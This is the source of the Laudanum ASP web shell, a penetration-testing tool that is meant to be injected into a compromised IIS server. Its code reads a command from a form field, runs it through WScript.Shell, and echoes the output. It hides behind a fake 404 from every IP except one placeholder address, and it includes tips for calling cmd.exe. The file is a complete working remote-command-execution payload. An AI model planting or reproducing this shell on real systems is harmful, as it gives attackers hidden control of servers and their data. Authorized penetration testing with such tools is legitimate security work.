&lt;%&#039; *******************************************************************************&#039; ***&#039; *** Laudanum Project&#039; *** A Collection of Injectable Files used during a Penetration Test&#039; ***&#039; *** More information is available at:&#039; ***  http://laudanum.professionallyevil.com/&#039; ***  laudanum@secureideas.net&#039; ***&#039; ***  Project Leads:&#039; ***         Kevin Johnson @secureideas &lt;kjohnson@secureideas.com&gt;&#039; ***         Tim Medin @timmedin &lt;tim@securitywhole.com&gt;&#039; ***         John Sawyer @johnhsawyer &lt;john@inguardians.com&gt;&#039; ***&#039; *** Copyright 2015 by The Laudanum Team&#039; ***&#039; ********************************************************************************&#039; ***&#039; ***   Updated and fixed by Robin Wood &lt;Digininja&gt;&#039; ***   Updated and fixed by Tim Medin &lt;tim@securitywhole.com&gt;&#039; ***&#039; ********************************************************************************&#039; *** This program is free software; you can redistribute it and/or&#039; *** modify it under the terms of the GNU General Public License&#039; *** as published by the Free Software Foundation; either version 2&#039; *** of the License, or (at your option) any later version.&#039; ***&#039; *** This program is distributed in the hope that it will be useful,&#039; *** but WITHOUT ANY WARRANTY; without even the implied warranty of&#039; *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the&#039; *** GNU General Public License for more details.&#039; ***&#039; *** You can get a copy of the GNU General Public License from this&#039; *** address: http://www.gnu.org/copyleft/gpl.html#SEC1&#039; *** You can also write to the Free Software Foundation, Inc., Temple&#039; *** Place - Suite  Boston, MA   USA.&#039; ***&#039; ***************************************************************************** */&#039; can set this to 0 for never time out but don&#039;t want to kill the server if a script&#039; goes into a loop for any reasonServer.ScriptTimeout = 180ip=request.ServerVariables(&quot;REMOTE_ADDR&quot;)if ip&lt;&gt;&quot;1.2.3.4&quot; then response.Status=&quot;404 Page Not Found&quot; response.Write(response.Status) response.Endend ifif Request.Form(&quot;submit&quot;) &lt;&gt; &quot;&quot; then   Dim wshell, intReturn, strPResult   cmd = Request.Form(&quot;cmd&quot;)   Response.Write (&quot;Running command: &quot; &amp; cmd &amp; &quot;&lt;br /&gt;&quot;)   set wshell = CreateObject(&quot;WScript.Shell&quot;)   Set objCmd = wShell.Exec(cmd)   strPResult = objCmd.StdOut.Readall()   response.write &quot;<br>&lt;pre&gt;&quot; &amp; replace(replace(strPResult,&quot;&lt;&quot;,&quot;&amp;lt;&quot;),vbCrLf,&quot;<br>&quot;) &amp; &quot;&lt;/pre&gt;&quot;   set wshell = nothingend if%&gt;<html><title>Laundanum ASP Shell</title><head>&lt;title&gt;Laundanum ASP Shell&lt;/title&gt;</head>&lt;body onload=&quot;document.shell.cmd.focus()&quot;&gt;<form>Command: <input type=text>&quot; /&gt;&lt;br /&gt;<input type=submit>&lt;p&gt;Don&#039;t forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don&#039;t forget to use the /c switch so cmd.exe terminates when your command is done.&lt;p&gt;Example command to do a directory listing:<br>%ComSpec% /c dir</form>&lt;hr/&gt;&lt;address&gt;Copyright &amp;copy; 2014, &lt;a href=&quot;mailto:laudanum@secureideas.net&quot;&gt;Kevin Johnson&lt;/a&gt; and the Laudanum team.&lt;br/&gt;Written by Tim Medin.&lt;br/&gt;Get the latest version at &lt;a href=&quot;http://laudanum.secureideas.net&quot;&gt;laudanum.secureideas.net&lt;/a&gt;.&lt;/address&gt;</body></html>